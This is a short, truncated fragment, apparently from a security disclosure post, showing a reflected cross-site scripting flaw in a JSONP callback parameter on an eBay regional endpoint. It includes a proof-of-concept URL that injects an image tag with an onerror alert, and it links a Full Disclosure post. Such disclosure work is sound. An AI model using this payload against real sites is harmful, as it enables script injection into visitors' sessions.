Returns: http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=? then: http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E Can also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS th...